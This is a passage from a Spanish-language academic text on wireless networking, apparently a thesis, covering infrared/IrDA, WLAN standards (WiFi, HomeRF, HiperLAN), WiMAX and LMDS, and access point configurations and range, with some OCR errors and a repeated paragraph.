luz infrarroja. La mayoría de los controles remotos de los aparatos domésticos (televisión,
vídeo, equipos de música, etc.), utilizan comunicación por infrarrojo. Por otro lado, la
mayoría de las famosas PDA (agendas electrónicas personales), algunos modelos de
teléfonos móviles y muchas computadoras portátiles incluyen un dispositivo infrarrojo
como medio de comunicación entre ellas, como se muestra en la Figura 1.4.

REDES WLAN CON ACCESS POINT 14


Figura 1.4 Teléfono Celular Infrarrojo.

Los sistemas de comunicaciones de infrarrojo pueden ser divididos en dos categorías:

• Infrarrojo de haz directo. Esta comunicación necesita una visibilidad directa sin
obstáculos entre ambas terminales.

• Infrarrojo de haz difuso. En este caso el haz tiene suficiente potencia como para
alcanzar el destino mediante múltiples reflexiones en los obstáculos intermedios.
En este caso no se necesita visibilidad directa entre terminales.

Las ventajas que ofrecen las comunicaciones de infrarrojo es que no están reguladas, son de
bajo costo e inmunes a interferencias de los sistemas de radio de alta frecuencia. Sus
principales inconvenientes son su corto alcance, el hecho de que no puedan traspasar
objetos y que no son utilizables en el exterior debido a que agentes naturales como la lluvia
o la niebla les producen grandes interferencias. El estándar original IEEE 802.11 (antecesor
de WiFi) contemplaba el uso de infrarrojos, pero nunca llegó a desarrollarse debido
principalmente a los inconvenientes mencionados.

REDES WLAN CON ACCESS POINT 15


No obstante, no cabe duda de que los sistemas infrarrojos son de los más eficaces sistemas
de comunicaciones punto a punto para corta distancia. De hecho, es el sistema utilizado, no
sólo por millones de controles remotos, sino por millones de computadoras portátiles, PDA,
teléfonos móviles y otros equipos electrónicos de todo el mundo. IrDA (Infrared Data
Association) es una asociación que tiene como objetivo crear y promover el uso de sistemas
de comunicaciones por infrarrojo. Actualmente tiene creados dos estándares:

• IrDA-Control. Es un protocolo de baja velocidad optimizado para ser utilizado en


los dispositivos de control remoto inalámbricos. Éste es el caso de dispositivos
como los controles remotos de aparatos electrónicos, ratones de computadora o
joysticks.

• IrDA-Data. Es un protocolo orientado a crear redes de datos de corto alcance. Está


diseñado para trabajar a distancias menores de 1 metro y a velocidades que van
desde los 9.6 Kbps hasta los 16 Mbps. Existe una versión que extiende el alcance a
2 metros, con un alto costo de consumo energético, y otra que reduce el alcance a 30
cm, reduciendo el consumo energético a la décima parte. Existen también varios
protocolos opcionales que habilitan el protocolo IrDA-Data para ser utilizado en
aplicaciones específicas. Éste es el caso de IrCOMM (Infrared SehallParallelPort
Emulation, ‘Emulador Infrarrojo de Puerto Serial Paralelo’), IrTran-P (Infrared
Digital Image Transfer, ‘Transferencia de Imagen Digital con Infrarrojo’), IrLAN
(Infrared Local Área Network Connectivity, ‘Conectividad de Red de Área Local
con Infrarrojo’) o IrMC (Infrared Mobile Comunications, ‘Comunicaciones Móviles
con Infrarrojo’).

La tecnología de infrarrojos parece que ha encontrado su nicho en las comunicaciones a


muy corto alcance. Esto convierte a IrDA en "compatible con tecnologías como Bluetooth.
Además, IrDA ofrece la ventaja adicional de la seguridad, ya que las emisiones de haces
infrarrojos se quedan en un entorno mucho más privado que las propagaciones de ondas de
radio.

REDES WLAN CON ACCESS POINT 16


1.4 REDES INALÁMBRICAS DE ÁREA LOCAL.

Las tecnologías WLAN permiten a los usuarios establecer conexiones inalámbricas dentro
de un área local (por ejemplo, un edificio corporativo o campus empresarial, o en un
espacio público como un aeropuerto). Las WLAN se pueden utilizar en oficinas temporales
u otros espacios donde la instalación de extenso cableado seria prohibitivo, o para
complementar una LAN existente de modo que los usuarios pueden trabajar en diferentes
lugares dentro de un edificio a diferentes horas.

Las WLAN pueden operar de dos formas distintas. En las WLAN de infraestructura, las
estaciones inalámbricas (dispositivos con radio tarjetas de red o módems externos) se
conectan a puntos de acceso inalámbricos que funcionan como puentes entre las estaciones
y la red troncal existente, como se muestra en la Figura 1.5. En las WLAN de igual a igual
(ad hoc), varios usuarios dentro de un área limitada, como una sala de conferencias, pueden
formar una red temporal sin utilizar puntos de acceso, si no necesitan obtener acceso a
recursos de red.

En 1997, el IEEE aprobó la norma 802.11 para las WLAN, que especifica una velocidad de
transferencia de datos de 1 a 2 Megabits por segundo (Mbps). En la 802.11b, que está
emergiendo como la nueva norma dominante, los datos se transfieren a una velocidad
máxima de 11 Mbps a través de una banda de frecuencia de 2.4 Gigahertz (GHz). Otra
norma reciente es la 802.11a, que especifica una transferencia de datos a una velocidad
máxima de 54 Mbps a través de una banda de frecuencia de 5 GHz. Las redes inalámbricas
se diferencian de las convencionales principalmente en la "Capa Física" y la "Capa de
Enlace de Datos", según el modelo de referencia OSI. La capa física indica como son
enviados los bits de una estación a otra. La capa de Enlace de Datos (denominada MAC), se
encarga de describir como se empacan y verifican los bits de modo que no tengan errores.
Las demás capas forman los protocolos o utilizan puentes, ruteadores o compuertas para
conectarse. Los dos métodos para remplazar la capa física en una red inalámbrica son la
transmisión de Radio Frecuencia y la Luz Infrarroja.

REDES WLAN CON ACCESS POINT 17


Figura 1.5 Red WLAN.

En el mercado existen distintas tecnologías que dan respuesta a esta necesidad.


Entre estas tecnologías se encuentran las siguientes:

• WiFi
• HomeRF
• HiperLAN
• HiSWAN
• OpenAir

1.4.1 WIFI

Durante bastantes años, las redes inalámbricas de computadoras se llevaban a cabo


utilizando soluciones particulares de cada fabricante. Estas soluciones, llamadas
propietarias, tenían el gran inconveniente de no permitir interconectar equipos de distintos
fabricantes.

REDES WLAN CON ACCESS POINT 18


Cada fabricante desarrollaba su propia solución y la comercializaba por su cuenta. Para el
cliente, esto suponía tener que trabajar siempre con el mismo fabricante, y, por tanto, estar
sometido siempre a las limitadas soluciones que un solo fabricante puede ofrecer.

La única forma de resolver este problema es desarrollar un sistema normalizado que


acepten los fabricantes como sistema común. Idealmente, son los organismos
internacionales de normalización quienes realizan este trabajo con la ayuda de los propios
interesados. No obstante, en muchas ocasiones una de las empresas o asociación de
empresas ha sido la que ha logrado imponer su sistema en el mercado. Éste es el caso, por
ejemplo, del sistema VHS de vídeo o del sistema GSM de comunicaciones móviles.

En el caso de las redes locales inalámbricas, el sistema que se está imponiendo es el


normalizado por IEEE con el nombre 802.11b. A esta norma se la conoce más
habitualmente como WiFi o Wireless Fidelity (‘Fidelidad Inalámbrica’). Con el sistema
WiFi se pueden establecer comunicaciones a una velocidad máxima de 11 Mbps,
alcanzándose distancias de hasta varios cientos de metros. No obstante, versiones más
recientes de esta tecnología permiten alcanzar los 22, 54 y hasta los 100 Mbps. A
continuación se muestran algunos de los dispositivos compatibles con WIFI en la Figura
1.6.

Figura 1.6 Dispositivos compatibles con WiFi.

REDES WLAN CON ACCESS POINT 19


1.4.2 HOMERF

En 1998 se creó un grupo de trabajo bajo el nombre HomeRF (Home Radio Frequency,
‘Radiofrecuencia del Hogar’) con el objetivo de desarrollar y promover un sistema de red
inalámbrica para el hogar. Aunque el grupo de trabajo lo formaron, inicialmente Compaq,
HP, IBM, Intel y Microsoft, posteriormente se le han ido uniendo más miembros hasta casi
alcanzar los 100 a finales de 2000. Actualmente cuentan con menos miembros debido a la
proliferación de otras tecnologías.

A principios de 1999, HomeRF sacó la versión 1.0 de su protocolo SWAP (Shared


Wireless Access Protocol, ‘Protocolo de Acceso Compartido Inalámbrico’). La versión 2.0
de este protocolo salió en mayo de 2001. SWAP trabaja en la banda de frecuencias de 2.4
GHz y permite configuraciones de comunicaciones punto a punto y comunicaciones con
punto de comunicación central.

La versión 1.0 permite transmitir datos a 1.6 Mbps y mantener hasta cuatro comunicaciones
dúplex de voz. Tiene un alcance de unos 50 metros y una potencia de transmisión de 100
mW. Utiliza un protocolo similar a IEEE 802.11 para datos y otro similar a DECT para
voz. La versión 2.0 alcanza los 10 Mbps y se espera que la versión 3.0 alcance los 40 Mbps
para llegar a los 100 Mbps en versiones posteriores. Por cierto, HomeRF, como Bluetooth,
utiliza el sistema FHSS.

1.4.3 HIPERLAN

HiperLAN (High-PerformanceRadio Local Área Network, ‘Red de Área Local de Radio de


Alto Rendimiento’) es el resultado de los trabajos de ETSI (European Telecommunications
Standards Institute, ‘Instituto Europeo de Normalización en Telecomunicaciones’) para
conseguir un estándar de red de área local inalámbrica vía radio. La primera versión de este
estándar, HiperLAN/1, publicada en 1996, trabajaba en la banda de frecuencias de 5 GHz y
alcanzaba velocidades de hasta 24 Mbps.

REDES WLAN CON ACCESS POINT 20


En 1997 ETSI reconoció que HiperLAN/1 no estaba resultando viable comercialmente y
creó un proyecto llamado BRAN (Broadband Radio Access Network, ‘Red de Acceso
Radio de Banda Ancha’). El resultado se obtuvo en febrero de 2000 con HiperLAN/2. Este
estándar está diseñado para ofrecer accesos inalámbricos de alta velocidad a redes ATM
(Asynchronous Transfer Mode, ‘Modo de Transferencia Asíncrono’), a redes celulares de
tercera generación, FirewirelEEE 1394 y redes IP.

HiperLAN/2 ofrece velocidades de transmisión de 54 Mbps utilizando el sistema OFDM


(Orthogonal Frequency División Multiplexing, ‘Multiplexado Ortogonal por División de
Frecuencia’). Las frecuencias utilizadas son de 5.25 a 5.35 GHz para sistemas de interior a
200 mW de potencia y de 5.47 a 5.725 GHz para sistemas de exterior a 1000mW de
potencia. En 1999 se creó una asociación, HiperLAN2 Global Forum, formada por Nokia,
Tenovis, Dell, Ericsson y Texas Instrument para promover el uso de este estándar. A pesar
de ello, este sistema sigue sin alcanzar el éxito comercial deseado.

1.5 REDES INALÁMBRICAS DE ÁREA METROPOLITANA.

Las tecnologías WMAN permiten a los usuarios establecer conexiones inalámbricas entre
varias ubicaciones dentro de un área metropolitana (por ejemplo, entre varios edificios de
oficinas de una ciudad o en un campus universitario), sin el alto coste que supone la
instalación de cables de fibra o cobre y el alquiler de las líneas. Además, WMAN puede
servir como copia de seguridad para las redes con cable, en caso de que las líneas
alquiladas principales para las redes con cable no estén disponibles. WMAN utiliza ondas
de radio o luz infrarroja para transmitir los datos. Las redes de acceso inalámbrico de banda
ancha, que proporcionan a los usuarios acceso de alta velocidad a Internet, tienen cada vez
mayor demanda. Aunque se están utilizando diferentes tecnologías, como el servicio de
distribución multipunto de canal múltiple (MMDS) y los servicios de distribución
multipunto local (LMDS), el grupo de trabajo de IEEE 802.16 para los estándares de acceso
inalámbrico de banda ancha sigue desarrollando especificaciones para normalizar el
desarrollo de estas tecnologías.

REDES WLAN CON ACCESS POINT 21


A continuación se muestra un ejemplo de una red inalámbrica de área metropolitana Figura
1.7.

Figura 1.7 Red inalámbrica de área metropolitana.

1.5.1 LMDS

LMDS es una tecnología inalámbrica vía radio para comunicación entre puntos fijos. Esto
quiere decir que no es una tecnología pensada para ser utilizada por terminales en
movimiento. El rango de frecuencias utilizado varía entre 2 y 40 GHz dependiendo de la
regulación del país en el que se utilice.

LMDS utiliza un transmisor central emitiendo su señal sobre un radio de hasta 5


kilómetros. Las antenas de los receptores se sitúan generalmente en las azoteas de los
edificios para procurar una visibilidad directa con el transmisor central. Un inconveniente
de los sistemas LMDS es que no existe un estándar que asegure la compatibilidad de los
equipos de distintos fabricantes. En cualquier caso, en general, las soluciones LMDS no
están teniendo una buena aceptación comercial.

REDES WLAN CON ACCESS POINT 22


1.5.2 WiMAX

WiMAX (Worldwide Interopembility for Microwave /Access, ‘Interoperatividad mundial


para accesos de microondas’) es una organización sin ánimo de lucro creada en abril de
2002 por fabricantes y suministradores de equipos inalámbricos. WiMAX en septiembre de
2005 tenía cerca de 70 miembros, entre los que se encuentran Intel, Nokia o Fujitsu.

El objetivo de WiMAX es promover el uso de las tecnologías IEÍEE 802.16a y ETSI


HiperMAN y asegurar su interoperatividad. Estas tecnologías permiten crear redes
inalámbricas metropolitanas de banda ancha, como se muestra en la Figura 1.8. Tanto el
IEEE norte americano como el ETSI europeo han estado trabajando en los últimos años en
la definición de un estándar de red inalámbrica metropolitana.

Los primeros resultados fueron la definición de dos protocolos punto-multipunto (IEEE


802.16 y ETSI HiperAccess) que operan a frecuencias superiores a 11 GHz. Estas
frecuencias tienen el inconveniente de necesitar visibilidad directa, por lo que obstáculos,
como edificios o árboles, limitan grandemente su aplicación. Por este motivo, ambas
organizaciones han desarrollado nuevos estándares que operan en la banda de 2 a 11 GHz.
El resultado son un par de protocolos, IEEE 802.16a y ETSI HiperMAN, que tienen la
particularidad de poder interoperar entre sí. Desde el punto de vista de la cobertura, una
estación base típica WiMAX (802.16a/HiperMAN) tiene un alcance de hasta 50 kilómetros.
Aunque la cobertura típica suele ser menor de 10 kilómetros.

Por otro lado, desde el punto de vista del servicio, una estación base puede ofrecer servicio
a más de 60 empresas (a 2Mbps) y cientos de hogares (a 256 Kbps) simultáneamente. Todo
esto convierte a WiMAX en una tecnología de banda ancha alternativa a ADSL o el cable.
De hecho, también se la conoce como WDSL (Wireless DSL, ‘DSL inalámbrico’).

REDES WLAN CON ACCESS POINT 23


Figura 1.8 Red inalámbrica WIMAX.

Para garantizar la conectividad, aún en las peores condiciones, WiMAX considera la


utilización de distintos tipos de modulaciones, como se muestra en la Figura 1.9, pudiendo
aumentar el alcance a costa de bajar la velocidad de conexión. Por otro lado, aunque
actualmente se está trabajando a velocidades de hasta 72 Mbps, se espera poder aumentar
esta velocidad en un futuro.

Figura 1.9 Torre para WiMax.

REDES WLAN CON ACCESS POINT 24


1.6 REDES INALÁMBRICAS DE ÁREA EXTENSA.

Las tecnologías WWAN permiten a los usuarios establecer conexiones inalámbricas a


través de redes remotas públicas o privadas. Estas conexiones pueden mantenerse a través
de áreas geográficas extensas, como ciudades o países, mediante el uso de antenas en varias
ubicaciones o sistemas satelitales que mantienen los proveedores de servicios inalámbricos.

Las tecnologías WWAN actuales se conocen como sistemas de segunda generación (2G).
Entre los sistemas 2G principales se incluyen Global System for Mobile Communications
(GSM), Cellular Digital Packet Data (CDPD) y Code División Múltiple Access (CDMA).

Los esfuerzos van encaminados a la transición desde redes 2G, algunas de las cuales tienen
capacidades limitadas de movilidad y son incompatibles entre sí, a tecnologías de tercera
generación (3G) que seguirían un estándar global y proporcionarían capacidades de
movilidad internacional. La UIT está promoviendo activamente el desarrollo de una norma
global para 3G.

1.7 DIFERENCIAS TECNOLÓGICAS ENTRE LAS REDES


INALÁMBRICAS.

Como hemos visto anteriormente, existen muchas tecnologías distintas de comunicaciones


inalámbricas. Muchas de estas tecnologías son complementarias (éste es el caso de
Bluetooth, WiFi o UMTS), pero otras dan respuesta a una misma necesidad y, por tanto,
compiten entre ellas por ser las preferidas del mercado.

En el caso de las tecnologías de redes de área local inalámbricas, la competencia se centra


en WiFi, HiperLAN, HomeRF y las nuevas versiones tecnológicas de cada una de ellas.

REDES WLAN CON ACCESS POINT 25


Para que una tecnología esté lista para ser adoptada por el mercado, es necesario que tenga
suficientemente desarrolladas estas cinco características:

• Normalización.
• Regulación.
• Tecnología.
• Servicios.
• Precios.

En el caso de las redes locales inalámbricas, la tecnología que tiene mejor posicionamiento
en estos cinco puntos es WiFi. Sobre todo, tiene el mejor posicionamiento en el apartado
precios, lo cual está resultando determinante para que el mercado acepte esta tecnología
frente a sus competidores. Claro que el mercado de las comunicaciones inalámbricas de
datos se acaba de despertar ahora, por lo que WiFi sólo lleva ganada la primera batalla de lo
que, seguro, será una dura guerra. A continuación se muestran en la Tabla 1.2 las
características de WIFI, HiperLan y Home RF.

Tabla 1.2 Nivel de adaptación al mercado de las distintas tecnologías de redes locales
inalámbricas.

Característica WiFi HiperLan HomeRF


Normalización Alto Alto Bajo
Regulación Alto Medio Alto
Tecnología Medio Alto Alto
Servicios Bajo Alto Medio
Precios Alto Bajo Bajo

REDES WLAN CON ACCESS POINT 26


1.8 LA REGULACIÓN

Uno de los aspectos más importantes para el desarrollo de una tecnología es la regulación.
En cada país existe un organismo que se encarga de regular el uso del espectro
radioeléctrico. Si dos dispositivos intentasen utilizar la misma frecuencia al mismo tiempo
y en el mismo lugar, ninguno de los dos funcionaría. Esto quiere decir que, para que
funcionen los equipos de radio, es necesario regular el uso de las bandas de frecuencias.

El espectro radioeléctrico es único y se considera un bien social. El regulador del espectro


radio eléctrico se asegura que cada servicio que utiliza dicho espectro (televisión, radio,
policía, ambulancia, telefonía móvil, etc.) lo pueda hacer con las mejores garantías y sin
que existan interferencias entre ellos. Por este motivo, la mayoría de las bandas de
frecuencia no pueden ser utilizadas a menos que se disponga de una licencia (éste es el caso
de la telefonía móvil, las emisoras de radio o de televisión, por ejemplo).

REDES WLAN CON ACCESS POINT 27


CAPÍTULO II
CARACTERÍSTICAS DE LAS REDES INALÁMBRICAS

INTRODUCCIÓN:

Las redes inalámbricas se basan en un enlace que utiliza ondas electromagnéticas (radio e
infrarrojo) en lugar de cableado estándar. Permiten que los dispositivos remotos se
conecten sin dificultad, ya se encuentren a unos metros de distancia como a varios
kilómetros. Asimismo, la instalación de estas redes no requiere de ningún cambio
significativo en la infraestructura existente como pasa con las redes cableadas.

Ventajas de una red de área local (LAN)

• Permite compartir dispositivos periféricos, computadoras, tarjetas de interfaz de red.


• Permite compartir los servicios de comunicaciones (ADSL, modem, cable, RDSI,
etc.).
• Permite el multiacceso a medios con alto ancho de banda
• Controlar la red de forma privada con administración local
• Proporcionan conectividad continua con los servicios locales
• Permite conectar dispositivos físicamente adyacentes

Las LAN permiten a las empresas aplicar tecnología informática para compartir localmente
archivos e impresoras de manera, y posibilitar las comunicaciones internas.

REDES WLAN CON ACCESS POINT 28


2.1 VENTAJAS DE LAS REDES INALÁMBRICAS.

Las principales ventajas que ofrecen las redes inalámbricas frente a las redes cableadas son
las siguientes:

Es notable en los costos, ya que se elimina todo el cable Ethernet y conexiones físicas entre
nodos, suelen ser más baratas y permiten gran movilidad dentro del alcance de la red (las
redes hogareñas inalámbricas suelen tener hasta 100 metros de la base transmisora).

• Desplazamiento: Con una computadora portátil no solo se puede acceder a internet


o a cualquier otro recurso de la red local desde cualquier parte de la oficina, casa si
no que nos podemos desplazar sin perder comunicación, como muestra en la Figura
2.1.

Figura 2.1 Desplazamiento de una red inalámbrica.

REDES WLAN CON ACCESS POINT 29


• Movilidad: La libertad de movimientos es uno de los beneficios más evidentes
dentro de las redes inalámbricas. Una computadora o cualquier otro dispositivo
pueden situarse en cualquier punto dentro del área de cobertura de la red sin tener
que depender de si es posible o no hacer llegar un cable hasta ese sitio,

• Flexibilidad: Las redes inalámbricas no solo nos permiten estar conectados mientras
nos desplazamos con una computadora portátil, sino también nos permiten colocar
una computadora de escritorio de cualquier lugar sin tener que hacer el más minino
cambio en la configuración de la red.

• Ahorro de costos: La instalación de una red inalámbrica permite ahorrar costos al


permitir compartir recursos acceso a internet etc. Cuando se dan cambios frecuentes
o entornos dinámicos. Tiene un mayor tiempo de vida. Menor gasto de instalación.

• Escalabilidad: Se llama escalabilidad a la facilidad de expandir la red después de su


instalación inicial.

2.2 DESVENTAJAS DE LAS REDES INALÁMBRICAS.

• Menor ancho de banda: Las redes de cable actuales trabajan a 100 Mbps, mientras
que las redes inalámbricas WiFi lo hacen a 11 Mbps. Es cierto que existen
estándares que alcanzan los 54 Mbps y soluciones propietarias que llegan a 100
Mbps, pero estos estándares están en los comienzos de su comercialización y tiene
un precio superior al de los actuales equipos WiFi.

• Mayor inversión inicial: Para la mayoría de las configuraciones de la red local, el


coste de los equipos de red inalámbricos es superior al de los equipos de red
cableada.

REDES WLAN CON ACCESS POINT 30


• Seguridad: Las redes inalámbricas tienen la particularidad de no necesitar un medio
físico para funcionar. Esto fundamentalmente es una ventaja, pero se convierte en
una desventaja cuando se piensa que cualquier persona con una computadora
portátil solo necesita estar dentro del área de cobertura de la red para poder intentar
acceder a ella.

Como el área de cobertura no está definida por paredes o por ningún otro medio físico, a los
posibles intrusos no les hace falta estar dentro de un edificio o estar conectado a un cable,
como se muestra en la Figura 2.2. Además, el sistema de seguridad que incorporan las redes
Wi-Fi no es de lo más fiables. A pesar de esto también es cierto que ofrece una seguridad
válida para la inmensa mayoría de las aplicaciones y que ya hay disponible un nuevo
sistema de seguridad (WPA) que hace a Wi-Fi mucho más confiable.

Figura 2.2 Poca seguridad de una red inalámbrica.

• Interferencias: Las redes inalámbricas funcionan utilizando el medio


radioelectrónico en la banda de 2,4 GHZ. Esta banda de frecuencias no requiere de
licencia administrativa para ser utilizada por lo que muchos equipos del mercado,
como teléfonos inalámbricos, microondas, etc., utilizan esta misma banda de
frecuencias. Además, todas las redes Wi-Fi funcionan en la misma banda de
frecuencias incluida la de los vecinos.

REDES WLAN CON ACCESS POINT 31


Este hecho hace que no se tenga la garantía de nuestro entorno radioelectrónico este
completamente limpio para que nuestra red inalámbrica funcione a su más alto rendimiento.
Cuantos mayores sean las interferencias producidas por otros equipos, menor será el
rendimiento de nuestra red. No obstante, el hecho de tener probabilidades de sufrir
interferencias no quiere decir que se tengan.

La mayoría de las redes inalámbricas funcionan perfectamente sin mayores problemas en


este sentido.

• Incertidumbre Tecnológica. La tecnología que actualmente se está instalando y que


ha adquirido una mayor popularidad es la conocida como Wi-Fi (IEEE 802.11B).
Sin embargo, ya existen tecnologías que ofrecen una mayor velocidad de
transmisión y unos mayores niveles de seguridad, es posible que, cuando se
popularice esta nueva tecnología, se deje de comenzar la actual o, simplemente se
deje de prestar tanto apoyo a la actual.

2.3 DIFERENCIAS ENTRE UNA RED CABLEADA Y UNA


INALÁMBRICA.

Después de analizar las ventajas y desventajas podemos sacar una conclusión, no obstante
se realizara una comparación de dichas tecnologías. La tecnología inalámbrica en los
hogares es un caso especial es raro encontrar una casa que tenga preinstalada una red
cableada de datos.

Sin embargo aun contando, con una única impresora, una única conexión a internet (vía
ADSL o cable). Para poder compartir estos recursos, se puede instalar una red rígida
cableada teniendo cables a través de las paredes o configurar una red inalámbrica. Es cierto
que la última solución es más cara que la primera pero también es más flexible.

REDES WLAN CON ACCESS POINT 32


En caso de las empresas puede ser similar al anterior, pero también nos encontramos con un
punto adicional. Las redes cableadas son un problema en aquellas empresas donde existe la
posibilidad de cambiar la disposición de los puestos de trabajo. Sin embargo, para una red
inalámbrica no supone ningún problema el cambiar una computadora de lugar.

El hecho de instalar una red inalámbrica no quiere decir que toda la red tenga que ser
inalámbrica. Las redes WiFi son completamente compatibles con las redes locales
cableadas Ethernet. Por tanto, la parte inalámbrica puede ser un complemento de la parte
cableada. Se puede cablear lo que sea fácil cablear y dejar a WiFi que resuelva la extensión
de la red a aquellas áreas más difícilmente cableables. Por otro lado, también se puede
disponer de una red de cable para unos usuarios y una red inalámbrica paralela para
aquellos otros que por la labor que desempeñan necesitan disfrutar de la ventaja de la
movilidad.

Por último las redes inalámbricas son ideales, por ejemplo si se necesita disponer de
conexión a red en lugares abiertos (por ejemplo, un campus universitario), en sitios
públicos (centros comerciales, redes vecinales, servicios municipales, etc) o sitios cerrados
pero disponiendo de movilidad (almacenes, salas de reuniones, etc.).

2.4 CONFIGURACIONES DE RED.

Las redes inalámbricas, al igual que las redes cableadas, sirven para interconectar cualquier
otro tipo de equipo informático al que se le pueda instalar un dispositivo inalámbrico ya
que la reducción del cableado, trae como consecuencia que se facilite su instalación,
disminuyendo el tiempo. Al utilizarse radiofrecuencias para la comunicación, nos permite
conectar zonas a las cuales no podamos llegar utilizando cableado, ya sea por costo o por
ubicación. Permitiendo la transmisión en tiempo real a usuarios. Lo que permite grandes
posibilidades de servicio y productividad, como se muestra en la Figura 2.3.

REDES WLAN CON ACCESS POINT 33


Las redes inalámbricas WiFi admiten distintas configuraciones o modos:

• Modo ad hoc o IBSS: es una configuración en la que solamente se necesita disponer


de tarjetas o dispositivos inalámbricos en cada terminal o PC, para que se
comuniquen unos con otros directamente, sin la intervención de puntos de acceso
intermedios.

• Modo Infraestructura o BSS: Se requiere de tarjetas o dispositivos Wi-Fi y, además


un equipo Access Point, que llevará a cabo la coordinación centralizada de la
comunicación entre los distintos terminales de la red.

• Modo ESS: Este tipo de configuración permite unir distintos puntos de acceso para
crear una red inalámbrica con una cobertura amplia, es decir, entonces que una red
ESS está formada por múltiples redes BSS.

Figura 2.3 Red conectada con varios dispositivos.

REDES WLAN CON ACCESS POINT 34


2.4.1 PUNTOS DE ACCESO.

Las configuraciones ad hoc son muy fáciles de configurar y resultan muy interesantes
cuando se necesita establecer una comunicación temporal entre dos equipos.

• Ad-hoc: Cada ordenador dispone de un adaptador inalámbrico y así se comunican


todos ellos entre sí, manteniendo una topología punto a punto. Si sólo necesitamos
que los ordenadores se "vean" entre sí, nos bastará este modo.

Por otro lado el modo infraestructura es el más adecuado para crear redes permanentes ya
que como queremos dotar de acceso a Internet a nuestra LAN, a través del módem,
utilizaremos el modo Infraestructura.

• Infraestructura: Cada ordenador dispone de un adaptador inalámbrico que sirve para


comunicarse con un router o punto de acceso (AP) inalámbrico central. De esta
forma podemos compartir una conexión a Internet, conectando el router Wi-Fi al
módem o router de nuestro proveedor de acceso a Internet, o comunicarnos a través
del AP con otras LAN o WAN.

También existe otra alternativa al modo ad hoc conocida como software de punto de
acceso. Esto consiste en configurar las computadoras en modo ad hoc y hacer que una de
estas computadoras haga las funciones de punto de acceso instalándose un programa
especial, el software de punto de acceso.

Algunas de las ventajas del punto de acceso son:

• El punto de acceso permite compartir el acceso a internet entre todas sus terminales
esto permite compartir el acceso de banda ancha (por ejemplo, ADSL o cable) entre
todas las terminales que forman la red, sean dos o cientos de ellas, como se muestra
en la Figura 2.4.

REDES WLAN CON ACCESS POINT 35


• El punto de acceso permite crear redes con mayor número de terminales.

• El punto de acceso ofrece características de gestión de la comunicación que no


ofrece el modo d hoc.

• El punto de acceso al igual que cualquier red local, permite compartir los recursos
de las terminales que formen la red (archivos, impresoras).

Figura 2.4 Punto de acceso (Access Point).

2.4.2 CONFIGURACIÓN PARA UNA RED EXTENSA.

Las configuraciones ESS permiten crear una red local inalámbrica con una área extensa de
cobertura. Para cubrir toda el área, se disponen de múltiples celdas BSS, cada una de las
cuales cuenta con su punto de acceso en esta configuración, las terminales pueden
desplazarse por toda el área de cobertura sin perder la comunicación. Las configuraciones
ESS resultan interesantes cuando se necesita cubrir una gran área de oficinas localizadas en
distintas plantas, un espacio público o lugares con alta concentración de terminales donde
un solo punto de acceso resulta escaso.

REDES WLAN CON ACCESS POINT 36


Los distintos puntos de acceso que forman una red ESS se interconectan entre sí a través de
una red que generalmente suele ser una red cableada Ethernet. Esta conexión sirve también
para que las terminales inalámbricas puedan comunicarse con las terminales de red
cableada. Para que funcionen las redes ESS, deben configurarse los distintos puntos de
acceso como miembros de una misma red. Esto implica que todos deben tener el mismo
nombre de red y la misma configuración de seguridad aunque funcionando en distintos
canales de radio. Este último es importante porque de otro modo los puntos de acceso se
interferirían unos a otros impidiendo la comunicación con sus terminales.

Cuando una terminal se mueve fuera de alcance del punto de acceso con el que está
asociado originalmente, automáticamente se reasocia con un nuevo punto de acceso con el
que tenga cobertura. Esta reasociacion la hace la terminal automáticamente, sin que el
usuario tenga que hacer nada. Desde el punto de vista del usuario, la conexión a una red
ESS es idéntica a la conexión a una red BSS. La única diferencia es que se dispone de una
mayor cobertura, como se observa en la Tabla 2.1.

Tabla 2.1 Relación entre distancia y velocidad con las tarjetas WiFi en ambientes ideales.

Velocidad Distancia en interior Distancia en exterior


11 Mbps 50 metros 270 metros
5.5 Mbps 80 metros 380 metros
2 Mbps 130 metros 430 metros
1 Mbps 160 metros 540 metros

2.5 ALCANCE DE UNA RED INALÁMBRICA.

Cuando decidimos instalar una red inalámbrica, generalmente se parte de unas necesidades
de cobertura. Pretendemos tener cobertura en toda la oficina, la casa, el entorno
empresarial o el pueblo completo.

REDES WLAN CON ACCESS POINT 37


Quiere esto decir que unos de los adaptadores de red (las tarjetas WiFi), como el de los
puntos de acceso. Los fabricantes anuncian que en un punto de acceso o una tarjeta WiFi
llega a tener una cobertura de cientos de metros de espacio abierto con visibilidad directa
entre terminales y sin interferencias de otros equipos que trabajen en la banda de 2.4 GHz
(microondas, teléfonos inalámbricos etc.). Esto es cierto, pero si se instala el punto de
acceso en el interior de una casa u oficina, el alcance puede reducirse a unos 25 a 50 metros
dependiendo de los obstáculos que haya en la habitación. Por otro lado la gran mayoría de
los equipos de WiFi vienen equipados con un sistema que baja automáticamente la
velocidad de transmisión conforme la señal de radio se va debilitando. Esto significa que,
conforme se aumenta la distancia entre emisor y receptor, se puede ir disminuyendo la
velocidad de transmisión de datos.

Además de la distancia, en el entorno existen otros factores que pueden afectar la cobertura
como son las interferencias (naturales y artificiales) o las perdidas de propagación debido a
los obstáculos. De hecho, muchas de estas condiciones del entorno son cambiantes, por lo
que en una posición puede haber cobertura en un momento dado y no haberla unos minutos
más tarde. Por ejemplo puede que no tenga cobertura en la cocina cuando tenga puesto el
microondas, pero si el resto del tiempo; o puede que no tenga cobertura en una zona del
patio cuando en primavera los arboles lo dejan completamente en sombra radioeléctrica,
pero si el resto del año. La conclusión es que mientras se complique la visibilidad entre las
terminales (por distancia, por obstáculos o pos las interferencias), la única manera de saber
exactamente si existe cobertura entre ellas es instalando los equipos y haciendo una prueba
real de cobertura. Cuando decidimos instalar una red inalámbrica, generalmente se parte de
unas necesidades de cobertura. Pretendemos tener cobertura en toda la oficina, la casa el
entorno empresarial o el pueblo completo. Quiere esto decir que uno de los factores más
importantes de las redes inalámbricas es la cobertura, un ejemplo lo encontramos en la
Figura 2.5. Los fabricantes anuncian que un punto de acceso o una tarjeta WiFi llega a tener
una cobertura de cientos de metros en espacio abierto con visibilidad directa entre
terminales y sin interferencias de otros equipos que trabajen en la banda de 2.4 GHz
(microondas, teléfonos inalámbricos, etc).

REDES WLAN CON ACCESS POINT 38


Esto es cierto, pero si se instala el punto de acceso en el interior de una casa u oficina, el
alcance puede reducirse a unos 25 a 50 metros dependiendo de los obstáculos que haya en
la habitación (armarios, mesas, etc.).

Figura 2.5 Red inalámbrica de gran alcance.

Por otro lado la mayoría de los equipos de WiFi vienen equipados con un sistema que baja
automáticamente la velocidad de transmisión conforme la señal de radio se va debilitando.
